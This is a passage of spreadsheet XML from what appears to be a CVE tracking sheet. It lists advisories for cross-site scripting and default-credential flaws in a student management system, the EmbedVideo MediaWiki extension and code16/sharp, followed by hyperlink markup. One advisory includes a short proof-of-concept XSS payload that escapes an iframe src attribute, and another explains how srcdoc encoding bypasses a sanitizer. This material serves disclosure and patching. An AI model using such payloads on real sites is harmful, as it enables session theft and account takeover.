      <c r="M815" s="5" t="inlineStr"/>
      <c r="N815" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O815" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P815" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q815" s="5" t="inlineStr"/>
      <c r="R815" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S815" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in ningzichun student-management-system up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this issue is the function echo of the file admin/fun/addLog.php. The manipulation of the argument reason/detail leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97650</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.7 → 2.0)</t>
        </is>
      </c>
      <c r="C816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97649</t>
        </is>
      </c>
      <c r="D816" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E816" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F816" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G816" s="5" t="inlineStr"/>
      <c r="H816" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I816" s="5" t="inlineStr"/>
      <c r="J816" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K816" s="5" t="inlineStr"/>
      <c r="L816" s="5" t="inlineStr"/>
      <c r="M816" s="5" t="inlineStr"/>
      <c r="N816" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O816" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P816" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q816" s="5" t="inlineStr"/>
      <c r="R816" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="S816" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in ningzichun student-management-system up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this vulnerability is an unknown functionality of the file example_lite.sql. Executing a manipulation can lead to use of default credentials. It is possible to launch the attack remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97649</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57440</t>
        </is>
      </c>
      <c r="D817" s="5" t="inlineStr"/>
      <c r="E817" s="5" t="inlineStr"/>
      <c r="F817" s="5" t="inlineStr"/>
      <c r="G817" s="5" t="inlineStr"/>
      <c r="H817" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I817" s="5" t="inlineStr"/>
      <c r="J817" s="5" t="inlineStr"/>
      <c r="K817" s="5" t="inlineStr"/>
      <c r="L817" s="5" t="inlineStr">
        <is>
          <t>composer:starcitizenwiki/embedvideo</t>
        </is>
      </c>
      <c r="M817" s="5" t="inlineStr">
        <is>
          <t>4.1.0</t>
        </is>
      </c>
      <c r="N817" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O817" s="5" t="inlineStr"/>
      <c r="P817" s="5" t="inlineStr"/>
      <c r="Q817" s="5" t="inlineStr"/>
      <c r="R817" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-80</t>
        </is>
      </c>
      <c r="S817" s="5" t="inlineStr">
        <is>
          <t>### Summary
With $wgEmbedVideoRequireConsent disabled (not the default), the urls for videos are passed into an iframe src attribute without sanitization. When given a malformed url or id, the src attribute can be escaped via double quotes, allowing for html/javascript injection.
### Details
The iframe assembled [here](https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo/blob/a573a16d925ee0ea0d34b360856dc8ab0b88f822/includes/EmbedService/EmbedHtmlFormatter.php#L204-L208) adds the url from `getUrl()` as the src without sanitization.
The id regex for the archiveorg service and the url regexes for the wistia and sharepoint services allow for double quotes to be introduced.
### PoC
Using double quotes, the src attribute can be escaped.
```
&lt;embedvideo service="archiveorg" id='a" onmouseover="alert(document.domain)" data-x="'&gt;&lt;/embedvideo&gt;
```
### Impact
When $wgEmbedVideoRequireConsent = false, any user able to edit a page can inject arbitrary JavaScript into an HTML event handler attribute (e.g. onfocus) via parameter. It requires no interaction (autofires via autofocus) and executes in the wiki origin for every visitor to the page.</t>
        </is>
      </c>
      <c r="T817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57440</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61823</t>
        </is>
      </c>
      <c r="D818" s="5" t="inlineStr"/>
      <c r="E818" s="5" t="inlineStr"/>
      <c r="F818" s="5" t="inlineStr"/>
      <c r="G818" s="5" t="inlineStr"/>
      <c r="H818" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I818" s="5" t="inlineStr"/>
      <c r="J818" s="5" t="inlineStr"/>
      <c r="K818" s="5" t="inlineStr"/>
      <c r="L818" s="5" t="inlineStr">
        <is>
          <t>composer:code16/sharp</t>
        </is>
      </c>
      <c r="M818" s="5" t="inlineStr">
        <is>
          <t>9.22.5</t>
        </is>
      </c>
      <c r="N818" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O818" s="5" t="inlineStr"/>
      <c r="P818" s="5" t="inlineStr"/>
      <c r="Q818" s="5" t="inlineStr"/>
      <c r="R818" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S818" s="5" t="inlineStr">
        <is>
          <t>### Impact
A Stored Cross-Site Scripting (XSS) vulnerability exists in the rich text editor due to improper sanitization of the srcdoc attribute on &lt;iframe&gt; elements.
While the underlying Symfony HtmlSanitizer correctly HTML-encodes special characters inside the attribute value (e.g., converting &lt;script&gt; to &amp;lt;script&amp;gt;), the HTML specification mandates that browsers automatically decode HTML entities inside attribute values before processing them. As a result, any encoded JavaScript inside a srcdoc attribute is evaluated and executed as live HTML/JS in the context of the iframe when the page is rendered.
An attacker with permissions to edit an Editor field can inject malicious scripts to target other users viewing the content. Potential impacts include:
- Session Hijacking (stealing admin session cookies via document.cookie)
- Account Takeover &amp; Privilege Escalation (e.g., a low-privileged editor triggering actions as an Administrator)
- Admin panel data theft
### Patches
The vulnerability has been patched in version v9.22.5.
The fix explicitly removes srcdoc from the list of allowed iframe attributes in `src/Utils/Sanitization/FormatsSanitizedValue.php`.
### Workarounds
Users who cannot upgrade immediately can manually sanitize all content of editor fields to strip `srcdoc` attributes.</t>
        </is>
      </c>
      <c r="T818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61823</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61825</t>
        </is>
      </c>
      <c r="D819" s="5" t="inlineStr"/>
      <c r="E819" s="5" t="inlineStr"/>
      <c r="F819" s="5" t="inlineStr"/>
      <c r="G819" s="5" t="inlineStr"/>
      <c r="H819" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I819" s="5" t="inlineStr"/>
      <c r="J819" s="5" t="inlineStr"/>
      <c r="K819" s="5" t="inlineStr"/>
      <c r="L819" s="5" t="inlineStr">
        <is>
          <t>composer:code16/sharp</t>
        </is>
      </c>
      <c r="M819" s="5" t="inlineStr">
        <is>
          <t>9.22.5</t>
        </is>
      </c>
      <c r="N819" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O819" s="5" t="inlineStr"/>
      <c r="P819" s="5" t="inlineStr"/>
      <c r="Q819" s="5" t="inlineStr"/>
      <c r="R819" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S819" s="5" t="inlineStr">
        <is>
          <t>### Impact
The vulnerability allows an attacker to bypass the HTML sanitizer by using the `data-html-content` attribute in the content of a `SharpEditorFormField`. 
### Patches
The field must now explicitly configure `SharpFormEditorField::RAW_HTML` in the toolbar to keep this behavior. **When using the  `RAW_HTML` button, the application using `code16/sharp` must sanitize manually the content coming from the field**. 
Vulnerability has been patched in version 9.22.5.
### Workarounds
Sanitize every contents of editors manually (e.g. using Symfony/HtmlSanitizer)</t>
        </is>
      </c>
      <c r="T819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61825</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T819"/>
  <conditionalFormatting sqref="E2:E819">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819">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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T560" r:id="rId559"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T561" r:id="rId560"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T562" r:id="rId561"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T563" r:id="rId562"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T564" r:id="rId563"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T565" r:id="rId564"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T566" r:id="rId565"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T567" r:id="rId566"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T568" r:id="rId567"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T569" r:id="rId568"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T570" r:id="rId569"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T571" r:id="rId570"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T572" r:id="rId571"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T573" r:id="rId572"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T574" r:id="rId573"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T575" r:id="rId574"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T576" r:id="rId575"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T577" r:id="rId576"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T578" r:id="rId577"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T579" r:id="rId578"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T580" r:id="rId579"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T581" r:id="rId580"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T582" r:id="rId581"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T583" r:id="rId582"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T584" r:id="rId583"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T585" r:id="rId584"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T586" r:id="rId585"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T587" r:id="rId586"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T588" r:id="rId587"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T589" r:id="rId588"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T590" r:id="rId589"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T591" r:id="rId590"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T592" r:id="rId591"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T593" r:id="rId592"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T594" r:id="rId593"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T595" r:id="rId594"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T596" r:id="rId595"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T597" r:id="rId596"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T598" r:id="rId597"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T599" r:id="rId598"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T600" r:id="rId599"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T601" r:id="rId600"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T602" r:id="rId601"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T603" r:id="rId602"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T604" r:id="rId603"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T605" r:id="rId604"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T606" r:id="rId605"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T607" r:id="rId606"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T608" r:id="rId607"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T609" r:id="rId608"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T610" r:id="rId609"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T611" r:id="rId610"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T612" r:id="rId611"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T613" r:id="rId612"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T614" r:id="rId613"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T615" r:id="rId614"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T616" r:id="rId615"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T617" r:id="rId616"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T618" r:id="rId617"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T619" r:id="rId618"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T620" r:id="rId619"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T621" r:id="rId620"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T622" r:id="rId621"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T623" r:id="rId622"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T624" r:id="rId623"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T625" r:id="rId624"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T626" r:id="rId625"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T627" r:id="rId626"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T628" r:id="rId627"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T629" r:id="rId628"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T630" r:id="rId629"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T631" r:id="rId630"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T632" r:id="rId631"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T633" r:id="rId632"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T634" r:id="rId633"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T635" r:id="rId634"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T636" r:id="rId635"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T637" r:id="rId636"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T638" r:id="rId637"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T639" r:id="rId638"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T640" r:id="rId639"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T641" r:id="rId640"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T642" r:id="rId641"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T643" r:id="rId642"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T644" r:id="rId643"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T645" r:id="rId644"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T646" r:id="rId645"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T647" r:id="rId646"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T648" r:id="rId647"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T649" r:id="rId648"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T650" r:id="rId649"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T651" r:id="rId650"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T652" r:id="rId651"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T653" r:id="rId652"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T654" r:id="rId653"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T655" r:id="rId654"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T656" r:id="rId655"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T657" r:id="rId656"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T658" r:id="rId657"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T659" r:id="rId658"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T660" r:id="rId659"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T661" r:id="rId660"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T662" r:id="rId661"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T663" r:id="rId662"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T664" r:id="rId663"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T665" r:id="rId664"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T666" r:id="rId665"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T667" r:id="rId666"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T668" r:id="rId667"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T669" r:id="rId668"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T670" r:id="rId669"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T671" r:id="rId670"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T672" r:id="rId671"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T673" r:id="rId672"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T674" r:id="rId673"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T675" r:id="rId674"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T676" r:id="rId675"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T677" r:id="rId676"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T678" r:id="rId677"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T679" r:id="rId678"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T680" r:id="rId679"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T681" r:id="rId680"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T682" r:id="rId681"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T683" r:id="rId682"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T684" r:id="rId683"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T685" r:id="rId684"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T686" r:id="rId685"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T687" r:id="rId686"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T688" r:id="rId687"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T689" r:id="rId688"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T690" r:id="rId689"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T691" r:id="rId690"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T692" r:id="rId691"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T693" r:id="rId692"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T694" r:id="rId693"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T695" r:id="rId694"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T696" r:id="rId695"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T697" r:id="rId696"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T698" r:id="rId697"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T699" r:id="rId698"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T700" r:id="rId699"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T701" r:id="rId700"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T702" r:id="rId701"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T703" r:id="rId702"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T704" r:id="rId703"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T705" r:id="rId704"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T706" r:id="rId705"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T707" r:id="rId706"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T708" r:id="rId707"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T709" r:id="rId708"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T710" r:id="rId709"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T711" r:id="rId710"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T712" r:id="rId711"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T713" r:id="rId712"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T714" r:id="rId713"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T715" r:id="rId714"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T716" r:id="rId715"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T717" r:id="rId716"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T718" r:id="rId717"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T719" r:id="rId718"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T720" r:id="rId719"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T721" r:id="rId720"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T722" r:id="rId721"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T723" r:id="rId722"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T724" r:id="rId723"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T725" r:id="rId724"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T726" r:id="rId725"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T727" r:id="rId726"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T728" r:id="rId727"/>
